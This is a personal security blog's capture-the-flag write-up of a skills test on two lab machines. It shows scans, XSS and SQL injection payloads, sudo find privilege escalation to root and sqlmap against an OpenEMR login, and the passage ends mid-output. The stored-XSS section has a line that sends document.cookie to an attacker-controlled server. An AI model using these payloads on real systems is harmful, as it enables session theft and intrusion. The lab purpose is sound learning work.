<!doctype html><html dir=ltr lang=en data-theme><head>
<title>
AEC
|
SkillsTest V1
</title>
<meta charset=utf-8><meta name=generator content="Hugo 0.87.0"><meta name=viewport content="width=device-width,initial-scale=1,viewport-fit=cover">
<meta name=description content="
      Vmricdb sw se gzqd, azozc fm mgxzp addkrcgjdvz.


    ">
<link rel=stylesheet href=/css/main.min.51423ad97099a08f3a20e16d238c13adae76db7dd5e1913789bdc81143ff4cc6.css integrity="sha256-UUI62XCZoI86IOFtI4wTra52233V4ZE3ib3IEUP/TMY=" crossorigin=anonymous type=text/css>
<link rel=stylesheet href=/css/markupHighlight.min.f798cbda9aaa38f89eb38be6414bd082cfd71a6780375cbf67b6d2fb2b96491e.css integrity="sha256-95jL2pqqOPies4vmQUvQgs/XGmeAN1y/Z7bS+yuWSR4=" crossorigin=anonymous type=text/css>
<link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css integrity="sha512-+4zCK9k+qNFUR5X+cKL9EIR+ZOhtIloNl9GIKS57V1MyNsYpYcUrUeQc9vNfzsWfV28IaLL3i96P9sdNyeRssA==" crossorigin=anonymous>
<link rel="shortcut icon" href=/favicon.ico type=image/x-icon>
<link rel=apple-touch-icon sizes=180x180 href=/apple-touch-icon.png>
<link rel=icon type=image/png sizes=32x32 href=/favicon-32x32.png>
<link rel=icon type=image/png sizes=16x16 href=/favicon-16x16.png>
<link rel=canonical href=/blog/skillstest-v1/>
<script type=text/javascript src=/js/anatole-header.min.2a2cd9614b7d007dfbb75e8da19e3a0fa872ceab53c6d000c00b7a0c89b85bfc.js integrity="sha256-KizZYUt9AH37t16NoZ46D6hyzqtTxtAAwAt6DIm4W/w=" crossorigin=anonymous></script>
<script type=text/javascript src=/js/anatole-theme-switcher.min.7fd87181cdd7e8413aa64b6867bb32f3a8dc242e684fc7d5bbb9f600dbc2b6eb.js integrity="sha256-f9hxgc3X6EE6pktoZ7sy86jcJC5oT8fVu7n2ANvCtus=" crossorigin=anonymous></script>
<meta name=twitter:card content="summary">
<meta name=twitter:title content="SkillsTest V1">
<meta name=twitter:description content="245 Skills test - Notes System 1  Target IP Address: 192.168.118.130 Open ports:  21 FTP (Anon allowed) 22 SSH 25 SMPT 80 HTTP (Werkzeug httpd 1.0.1)+(Python 3.9.0) 4444 krb254? (FourOhFourRequest) - Still gives 200 ok? 8080 HTTP (Apache/2.4.38 Debian) 1 service unrecognised (Linux kernel | HTTP requests)    ┌──(user㉿kali)-[~] └─$ nmap -A 192.168.118.130 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 12:19 GMT Nmap scan report for 192.">
<script type=application/ld+json>{"@context":"http://schema.org","@type":"BlogPosting","articleSection":"blog","name":"SkillsTest V1","headline":"SkillsTest V1","alternativeHeadline":"","description":"
      
        245 Skills test - Notes System 1  Target IP Address: 192.168.118.130 Open ports:  21 FTP (Anon allowed) 22 SSH 25 SMPT 80 HTTP (Werkzeug httpd 1.0.1)\u002b(Python 3.9.0) 4444 krb254? (FourOhFourRequest) - Still gives 200 ok? 8080 HTTP (Apache\/2.4.38 Debian) 1 service unrecognised (Linux kernel | HTTP requests)    ┌──(user㉿kali)-[~] └─$ nmap -A 192.168.118.130 Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-03-27 12:19 GMT Nmap scan report for 192.


      


    ","inLanguage":"en-gb","isFamilyFriendly":"true","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/ZiggorX.github.io\/blog\/skillstest-v1\/"},"author":{"@type":"Person","name":"AEC"},"creator":{"@type":"Person","name":"AEC"},"accountablePerson":{"@type":"Person","name":"AEC"},"copyrightHolder":{"@type":"Person","name":"AEC"},"copyrightYear":"2021","dateCreated":"2021-08-04T15:18:59.00Z","datePublished":"2021-08-04T15:18:59.00Z","dateModified":"2021-08-04T15:18:59.00Z","publisher":{"@type":"Organization","name":"AEC","url":"https://ZiggorX.github.io/","logo":{"@type":"ImageObject","url":"https:\/\/ZiggorX.github.io\/favicon-32x32.png","width":"32","height":"32"}},"image":[],"url":"https:\/\/ZiggorX.github.io\/blog\/skillstest-v1\/","wordCount":"2993","genre":[],"keywords":[]}</script>
</head>
<body>
<header><div class="page-top
animated fadeInDown">
<a role=button class=navbar-burger data-target=navMenu aria-label=menu aria-expanded=false>
<span aria-hidden=true></span>
<span aria-hidden=true></span>
<span aria-hidden=true></span>
</a>
<nav>
<ul class=nav__list id=navMenu>
<div class=nav__links>
</div>
<li>
<a class=theme-switch title="Switch Theme">
<i class="fas fa-adjust fa-fw" aria-hidden=true></i>
</a>
</li>
</ul>
</nav>
</div>
</header>
<div class=wrapper>
<aside><div class="sidebar
animated fadeInDown">
<div class=sidebar__content>
<div class=logo-title>
<div class=title>
<img src=/images/profilepic.jpg alt="profile picture">
<h3 title><a href=/>Cyber Security blog: By Ziggor</a></h3>
<div class=description>
<p>Vmricdb sw se gzqd, azozc fm mgxzp addkrcgjdvz.</p>
</div>
</div>
</div>
<ul class=social-links>
</ul>
</div><footer class="footer footer--sidebar">
<div class=by_farbox>
<ul class=footer__list>
<li class=footer__item>
&copy;
AEC
2021
</li>
</ul>
</div>
</footer>
<script type=text/javascript src=/js/medium-zoom.min.71100d84fab0ad794b8399a66ac810700cc78d703f715dc10af4d7ba7b761362.js integrity="sha256-cRANhPqwrXlLg5mmasgQcAzHjXA/cV3BCvTXunt2E2I=" crossorigin=anonymous></script></div>
</aside>
<main>
<div class=autopagerize_page_element>
<div class=content>
<div class="post
animated fadeInDown">
<div class=post-content>
<div class=post-title>
<h1>SkillsTest V1</h1>
</div><h1 id=245-skills-test---notes>245 Skills test - Notes</h1>
<h2 id=system-1>System 1</h2>
<ul>
<li>Target IP Address: 192.168.118.130</li>
<li>Open ports:
<ul>
<li>21 FTP (Anon allowed)</li>
<li>22 SSH</li>
<li>25 SMPT</li>
<li>80 HTTP (Werkzeug httpd 1.0.1)+(Python 3.9.0)</li>
<li>4444 krb254? (FourOhFourRequest) - Still gives 200 ok?</li>
<li>8080 HTTP (Apache/2.4.38 Debian)</li>
<li>1 service unrecognised (Linux kernel | HTTP requests)</li>
</ul>
</li>
</ul>
<pre><code class=language-term data-lang=term>┌──(user㉿kali)-[~]
└─$ nmap -A 192.168.118.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 12:19 GMT
Nmap scan report for 192.168.118.130
Host is up (0.0016s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 127.0.0.1 is not the same as 192.168.118.130
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 f5:f2:1d:64:04:1b:fd:92:22:7e:6b:71:b7:f4:72:49 (RSA)
|   256 4b:80:f8:74:c0:8d:aa:40:fc:38:02:16:9f:1c:3b:bd (ECDSA)
|_  256 a8:08:e5:35:12:d6:a4:cc:74:8f:4c:9c:02:62:f4:f1 (ED25519)
25/tcp   open  smtp    Postfix smtpd
|_smtp-commands: de3ca8149527.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
| ssl-cert: Subject: commonName=de3ca8149527
| Subject Alternative Name: DNS:de3ca8149527
| Not valid before: 2021-03-24T13:51:20
|_Not valid after:  2031-03-22T13:51:20
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http    Werkzeug httpd 1.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/1.0.1 Python/3.9.0
| http-title: Skills Test 2021
|_Requested resource was http://192.168.118.130/setup
4444/tcp open  krb524?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 200 OK
|     Date: Sat, 27 Mar 2021 12:19:43 GMT
|     Content-Length: 30
|     Content-Type: text/plain; charset=utf-8
|     using Selenoid 1.10.0!
|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Date: Sat, 27 Mar 2021 12:19:18 GMT
|     Content-Length: 30
|     Content-Type: text/plain; charset=utf-8
|_    using Selenoid 1.10.0!
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Skills Test 2021
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.91%I=7%D=3/27%Time=605F22C6%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,93,&quot;HTTP/1\.0\x20200\x20OK\r\nDate:\x20Sat,\x2027\x20Mar\x2020
SF:21\x2012:19:18\x20GMT\r\nContent-Length:\x2030\r\nContent-Type:\x20text
SF:/plain;\x20charset=utf-8\r\n\r\nYou\x20are\x20using\x20Selenoid\x201\.1
SF:0\.0!&quot;)%r(SSLSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConte
SF:nt-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\
SF:n400\x20Bad\x20Request&quot;)%r(TLSSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
SF::\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(SSLv23SessionReq,67,&quot;HTTP/1
SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(Generic
SF:Lines,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/p
SF:lain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Req
SF:uest&quot;)%r(HTTPOptions,93,&quot;HTTP/1\.0\x20200\x20OK\r\nDate:\x20Sat,\x2027\
SF:x20Mar\x202021\x2012:19:18\x20GMT\r\nContent-Length:\x2030\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\n\r\nYou\x20are\x20using\x20Sele
SF:noid\x201\.10\.0!&quot;)%r(RTSPRequest,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20cl
SF:ose\r\n\r\n400\x20Bad\x20Request&quot;)%r(Help,67,&quot;HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectio
SF:n:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(TerminalServerCookie,67,&quot;H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20ch
SF:arset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(Ke
SF:rberos,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest&quot;)%r(FourOhFourRequest,93,&quot;HTTP/1\.0\x20200\x20OK\r\nDate:\x20Sat,
SF:\x2027\x20Mar\x202021\x2012:19:43\x20GMT\r\nContent-Length:\x2030\r\nCo
SF:ntent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\nYou\x20are\x20using\
SF:x20Selenoid\x201\.10\.0!&quot;)%r(LPDString,67,&quot;HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\
SF:x20close\r\n\r\n400\x20Bad\x20Request&quot;);
Service Info: Host:  de3ca8149527.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.50 seconds
                                                                
</code></pre>
<hr>
<h3 id=port-21-ftp>Port 21 FTP:</h3>
<p>The previous Nmap scan incidicated that the FTP service was running on port 21. It also stated that anonymous login is permitted.</p>
<pre><code class=language-term data-lang=term>┌──(user㉿kali)-[~]
└─$ ftp 192.168.118.130:80
ftp: 192.168.118.130:80: Name or service not known
ftp&gt; exit
                                                                                        
┌──(user㉿kali)-[~]
└─$ ftp 192.168.118.130   
Connected to 192.168.118.130.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 30 allowed.
220-Local time is now 12:28. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.118.130:user): anonymous
230 Anonymous user logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls
200 PORT command successful
150 Connecting to port 45339
-rw-r--r--    1 0          0                  40 Mar 24 13:48 FTPFlag.txt
226-Options: -l 
226 1 matches total
ftp&gt; get FTPFlag.txt 
local: FTPFlag.txt remote: FTPFlag.txt
200 PORT command successful
150 Connecting to port 52727
226-File successfully transferred
226 0.016 seconds (measured here), 2.45 Kbytes per second
40 bytes received in 0.02 secs (2.3890 kB/s)
ftp&gt; exit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 Logout.
                                                                                   
┌──(user㉿kali)-[~]
└─$ ls
 FTPFlag.txt    Pictures     Music            Downloads 
 Desktop        hash.txt     Public           Templates
 Documents      hi.docm      __pycache__      Videos
                                                                                                    
┌──(user㉿kali)-[~]
└─$ cat FTPFlag.txt 
The Flag is CUEH:{anonymous_ftp_access}
</code></pre>
<hr>
<h3 id=port-80>Port 80</h3>
<p>We can navigate to the web service being hosted on the system through the browser. We are presented with challenges</p>
<p><img src=https://i.imgur.com/FRbjGdX.png alt="IP:80/setup sceenshot"></p>
<ul>
<li>We are presented with a multitude of challenges.</li>
<li>Lets begin:</li>
</ul>
<h4 id=website-enumeration>Website enumeration</h4>
<p>So we need to find a flag in a hidden page on the web-server, for this we can use directory bruteforcing.</p>
<p><img src=https://i.imgur.com/Kgdtu9A.png alt="dirb bruteforce"></p>
<ul>
<li>We scan using dirb by supplying the url then wordlist.</li>
<li>Next step is to look inside any interesting directories</li>
</ul>
<p><img src=https://i.imgur.com/tZvubLo.png alt=secrets></p>
<ul>
<li>This search came up with nothing, however at the moment we are only looking for files. We need to add the .html extension to look for webpages</li>
</ul>
<p><img src=https://i.imgur.com/qNJIMqB.png alt="-X .HTML"></p>
<ul>
<li>We find the flag page, move to it, and finish with the flag.</li>
</ul>
<h4 id=reflected-xss>Reflected XSS</h4>
<p><img src=https://i.imgur.com/0BZdbXs.png alt="Ref_XSS page"></p>
<ul>
<li>Lets begin by inserting the correct response</li>
</ul>
<p><img src=https://i.imgur.com/Vcjqixq.png alt=R-XSS_CorrectInput></p>
<ul>
<li>Next step again is to try a generic injection. For XSS I am using &lsquo;"&lt;&ldquo;script&rdquo;>&ldquo;alert(&lsquo;XSS&rsquo;)"&lt;"/script&rdquo;>"&rsquo; (Rm double quotes)</li>
</ul>
<p><img src=https://i.imgur.com/bYstJue.png alt=R-XSS_InitialInjeciton></p>
<ul>
<li>We can tell from the output that the initial &lsquo;script&rsquo; word in the first tag is removed</li>
<li>The entire seond tab has also been filtered out, with the tag boundaries also. (?Unintended?)</li>
</ul>
<p><img src=https://i.imgur.com/3qqdfb6.png alt=TrialInjection1></p>
<ul>
<li>Here we see that it is looking for the regex &lsquo;script&rsquo; and removing it.</li>
<li>Lets try splitting the word and sending that.</li>
</ul>
<p><img src=https://i.imgur.com/r8qaejb.png alt=TrialInjection2XSS></p>
<blockquote>
<p>This works and gives us a popup:</p>
</blockquote>
<p><img src=https://i.imgur.com/I6tJC6A.png alt=R-XSS_InjectPopup></p>
<blockquote>
<p>Upon exiting the popup, we are registered and the flag is presented.</p>
</blockquote>
<p><img src=https://i.imgur.com/N5uObiL.png alt="R-XSS Flag"></p>
<hr>
<h4 id=sql-bypass>SQL Bypass</h4>
<p><img src alt="SQL_Bypass page"></p>
<ul>
<li>We can begin by inserting a correct response to the form.</li>
</ul>
<p><img src=https://i.imgur.com/whIefKq.png alt=CorrectInput></p>
<blockquote>
<ul>
<li>We see that it outputs that no such user or pass exist</li>
</ul>
</blockquote>
<ul>
<li>Now it is time to try injection</li>
</ul>
<p><img src=https://i.imgur.com/VxnSpGb.png alt=InitialInject></p>
<blockquote>
<ul>
<li>Here we see that the field requires type &lsquo;email&rsquo;</li>
</ul>
</blockquote>
<p><img src=https://i.imgur.com/RQhcqNy.png alt=EmailZoomedIn></p>
<blockquote>
<ul>
<li>We can bypass this locally by accessing the inpsector tab and changing the field requirement.</li>
</ul>
</blockquote>
<p><img src=https://i.imgur.com/PQQdrYs.png alt="Type=text"></p>
<blockquote>
<ul>
<li>This redirects us to an error page, indicating that we are on the right tracks.</li>
<li>Now is time to break some logic (Assume from here that the type is always text)</li>
</ul>
</blockquote>
<p><img src=https://i.imgur.com/mahR2wT.png alt=InitialLogicBreak></p>
<blockquote>
<ul>
<li>The error that it cannot process that many users tells us that the query is trying to bring back the whole table.</li>
<li>Lets try to limit the results</li>
</ul>
</blockquote>
<p><img src=https://i.imgur.com/qHOxIMQ.png alt=LIMITResults></p>
<blockquote>
<ul>
<li>This is successful, and we can not begin to move around the table using offset.</li>
</ul>
</blockquote>
<p><img src=https://i.imgur.com/arUqfBg.png alt=FLAGResult></p>
<blockquote>
<p>Voila, we have the flag.</p>
</blockquote>
<hr>
<h4 id=privelege-escalation>Privelege Escalation</h4>
<blockquote>
<p>For this challenge, we have been provided with details privesc:privesc for SSH.</p>
</blockquote>
<pre><code class=language-term data-lang=term>┌──(user㉿kali)-[~/Desktop/Event/Build-a-CTF_Event]
└─$ ssh privesc@192.168.118.130
privesc@192.168.118.130's password: 
Linux 8dd4379b5499 5.4.82-0-virt #1-Alpine SMP Thu, 10 Dec 2020 08:58:01 UTC x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 28 18:54:42 2021 from 192.168.118.142
privesc@8dd4379b5499:~$ whoami
privesc
privesc@8dd4379b5499:~$ sudo -l
[sudo] password for privesc: 
Matching Defaults entries for privesc on 8dd4379b5499:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User privesc may run the following commands on 8dd4379b5499:
    (ALL : ALL) /usr/bin/find
privesc@8dd4379b5499:~$ sudo find . -exec /bin/sh \; -quit
# whoami
root
# cd ..
# ls
privesc
# cd ..
# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
# cd root
# ls
root.txt
# cat root.txt
245_SKILLS{Acc3s_All_Ar3@s}
# 
</code></pre><p><a href=https://gtfobins.github.io/gtfobins/find/>https://gtfobins.github.io/gtfobins/find/</a></p>
<h4 id=sql-enum>SQL Enum</h4>
<p>We are given the landing page for the enumeration.</p>
<p><img src=https://i.imgur.com/rNKYJqT.png alt="SQL Enum page"></p>
<ul>
<li>The first thing we can do is make sure it is bringing back all information</li>
<li>Using OR 1=1;# will bring everything out. By using this along with order by to test which columns relate to which numbers.</li>
<li>The command to use is &lt;&lsquo;or 1=1 order by 2;#> for this example, from using order by 1 nothing changed, therefore it must be some form of Unique ID that is not much use.</li>
<li>Order by 2 gives us the first bit of what we need.</li>
</ul>
<p><img src=https://i.imgur.com/cHUtZle.png alt=OrderBy2></p>
<ul>
<li>Once we iterate through all the columns, we come to find that the only available ones are 1,2,3,4.</li>
</ul>
<blockquote>
<p>ID (1) | Product Name (2) | Description (3) | Cost (4)</p>
</blockquote>
<ul>
<li>Another way of doing this is using a UNION SELECT statement, however you need to know the amount of columns</li>
</ul>
<p><img src=https://i.imgur.com/ycyg4hb.png alt=UnionSelect1234></p>
<blockquote>
<p>Now that we know that we can get information in the correct format we can begin to include other data that wouldnt otherwise be there</p>
<ul>
<li>A good place to start looking is in information_schema.tables</li>
</ul>
</blockquote>
<p><img src=https://i.imgur.com/ZvpqcOA.png alt=InformationSchemaCommand></p>
<ul>
<li>Then if we move to the bottom, there is some hiddenTable</li>
</ul>
<p><img src=https://i.imgur.com/0WQfabg.png alt=hiddenTableresult></p>
<ul>
<li>We can look in this table for keyword &lsquo;flag&rsquo; to see if anythign is returned. To do this, we just include it in one of the columns.</li>
</ul>
<p><img src=https://i.imgur.com/dRn8mst.png alt=flagsqlenum></p>
<hr>
<h4 id=stored-xss>Stored XSS</h4>
<p>new Image().src=&ldquo;http://192.168.118.142:8000/evil.php?output="+document.cookie</p>
<p>To begin this we are given a page where we can post a message to be stored somewhere.</p>
<p><img src=https://i.imgur.com/mroEfXD.png alt=StoredXSSstartpage></p>
<ul>
<li>We can post to this page by submitting with text in the box</li>
</ul>
<p><img src=https://i.imgur.com/XQPwqN7.png alt=MessageSubmit></p>
<ul>
<li>Now its time to see if we can get popups to work. (Earlier on this machine I set a cookie up, originally nothing was displayed, it was just used for debugging)</li>
</ul>
<p><img src=https://i.imgur.com/qQsoGy2.png alt=popup></p>
<ul>
<li>Time to spin up a python server to take the redirects we will set up</li>
</ul>
<p><img src=https://i.imgur.com/9iGjGSY.png alt=PythonServer></p>
<ul>
<li>When we try to use an image source to redirect the cookie to, we see that the server doesn&rsquo;t pick this up. We need to use &lsquo;new&rsquo; to be able to read the cookie.</li>
</ul>
<p><img src=https://i.imgur.com/AdVB92b.png alt=SessionToken></p>
<ul>
<li>Now we have the session token, we can become that user.</li>
</ul>
<hr>
<h4 id=file-includes>File Includes</h4>
<h5 id=directory-traversal>Directory Traversal</h5>
<p>For this task we are given a set of options that when selected and run allow us to input some traversal commands in the URL.</p>
<p>After putting many in and discovering that traversal was possible, it was just a case of putting the file name:</p>
<p><img src=https://i.imgur.com/nHslM7S.png alt=DirTrav></p>
<hr>
<h1 id=machine-2>Machine 2</h1>
<p>245ST2_Notes.md</p>
<p>IP ADDRESS: 192.168.119.132</p>
<p>NMap Scan:</p>
<pre><code class=language-term data-lang=term>┌──(user㉿kali)-[~]
└─$ nmap -sVC -T4 -p- 192.168.118.132
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-07 13:06 BST
Nmap scan report for 192.168.118.132
Host is up (0.00031s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 f5:f2:1d:64:04:1b:fd:92:22:7e:6b:71:b7:f4:72:49 (RSA)
|   256 4b:80:f8:74:c0:8d:aa:40:fc:38:02:16:9f:1c:3b:bd (ECDSA)
|_  256 a8:08:e5:35:12:d6:a4:cc:74:8f:4c:9c:02:62:f4:f1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
3306/tcp open  mysql   MySQL 5.7.25
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.25
|   Thread ID: 5
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, SwitchToSSLAfterHandshake, FoundRows, IgnoreSpaceBeforeParenthesis, LongPassword, SupportsLoadDataLocal, LongColumnFlag, Speaks41ProtocolNew, ConnectWithDatabase, InteractiveClient, SupportsCompression, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: 1\x0C/HN8u\x0E\x0C\\x103\~5\x19\x0Ev\x1Fh
|_  Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
4222/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:96:4b:ed:b8:06:53:1d:74:bb:96:89:8a:36:76:27 (RSA)
|   256 32:91:7b:a3:a1:4d:7a:26:f8:e6:75:6c:4d:58:7d:08 (ECDSA)
|_  256 5e:ce:ed:03:9d:d5:af:94:40:80:fb:59:04:7a:dd:12 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.79 seconds
</code></pre><h4 id=port-80-1>Port 80</h4>
<blockquote>
<p>The index for the webservice on port 80 shows us an OPENEMR Page.</p>
</blockquote>
<p><img src=https://i.imgur.com/Ft2rTQk.png alt=LoginPage></p>
<p>When directory bruteforcing (Ensure that use PHP and HTML extensions to find out more information.)</p>
<blockquote>
<p>Gobuster on the site</p>
</blockquote>
<pre><code class=language-term data-lang=term>┌──(user㉿kali)-[~]
└─$ gobuster dir -u http://192.168.118.132 -w /usr/share/wordlists/dirb/common.txt -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.118.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php
[+] Timeout:                 10s
===============================================================
2021/04/23 12:59:44 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.htaccess.html       (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htpasswd.html       (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.hta.html            (Status: 403) [Size: 280]
/admin.php            (Status: 200) [Size: 937]
/admin.php            (Status: 200) [Size: 937]
/common               (Status: 301) [Size: 319] [--&gt; http://192.168.118.132/common/]
/config               (Status: 301) [Size: 319] [--&gt; http://192.168.118.132/config/]
/contrib              (Status: 301) [Size: 320] [--&gt; http://192.168.118.132/contrib/]
/controller.php       (Status: 200) [Size: 37]                                       
/controllers          (Status: 301) [Size: 324] [--&gt; http://192.168.118.132/controllers/]
/custom               (Status: 301) [Size: 319] [--&gt; http://192.168.118.132/custom/]     
/images               (Status: 301) [Size: 319] [--&gt; http://192.168.118.132/images/]     
/index.php            (Status: 302) [Size: 0] [--&gt; interface/login/login.php?site=default]
/index.php            (Status: 302) [Size: 0] [--&gt; interface/login/login.php?site=default]
/interface            (Status: 301) [Size: 322] [--&gt; http://192.168.118.132/interface/]   
/library              (Status: 301) [Size: 320] [--&gt; http://192.168.118.132/library/]     
/LICENSE              (Status: 200) [Size: 35147]                                         
/modules              (Status: 301) [Size: 320] [--&gt; http://192.168.118.132/modules/]     
/portal               (Status: 301) [Size: 319] [--&gt; http://192.168.118.132/portal/]      
/public               (Status: 301) [Size: 319] [--&gt; http://192.168.118.132/public/]      
/server-status        (Status: 403) [Size: 280]                                           
/services             (Status: 301) [Size: 321] [--&gt; http://192.168.118.132/services/]    
/sites                (Status: 301) [Size: 318] [--&gt; http://192.168.118.132/sites/]       
/setup.php            (Status: 200) [Size: 1214]                                          
/sql                  (Status: 301) [Size: 316] [--&gt; http://192.168.118.132/sql/]         
/templates            (Status: 301) [Size: 322] [--&gt; http://192.168.118.132/templates/]   
/tests                (Status: 301) [Size: 318] [--&gt; http://192.168.118.132/tests/]       
/vendor               (Status: 301) [Size: 319] [--&gt; http://192.168.118.132/vendor/]      
/version.php          (Status: 200) [Size: 0]                                             
                                                                                          
===============================================================
2021/04/23 12:59:48 Finished
===============================================================
                                                    
</code></pre><p>I navigate to the admin page and get given the version of openEMR. Time to look up the Real World writeup.</p>
<p><img src=https://i.imgur.com/oKLIY1P.png alt="OpenEMR Vuln page"></p>
<pre><code class=language-term data-lang=term>                                                                                                                                                                                                                                            
┌──(user㉿kali)-[~]
└─$ sqlmap -r openemr.req --threads=10 -D openemr --tables                                                                                                                                                                              1 ⨯
        ___
       __H__                                                                                                                                                                                                                                
 ___ ___[']_____ ___ ___  {1.5.4#stable}                                                                                                                                                                                                    
|_ -| . [,]     | .'| . |                                                                                                                                                                                                                   
|___|_  [']_|_|_|__,|  _|                                                                                                                                                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                                                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:07:58 /2021-04-23/

[13:07:58] [INFO] parsing HTTP request from 'openemr.req'
[13:07:58] [INFO] resuming back-end DBMS 'mysql' 
[13:07:58] [INFO] testing connection to the target URL
[13:07:58] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (6722=6722) THEN 1 ELSE (SELECT 8202 UNION SELECT 8377) END))

    Type: error-based
    Title: MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: eid=1 AND GTID_SUBSET(CONCAT(0x71626a6a71,(SELECT (ELT(4791=4791,1))),0x7162627171),4791)

    Type: time-based blind
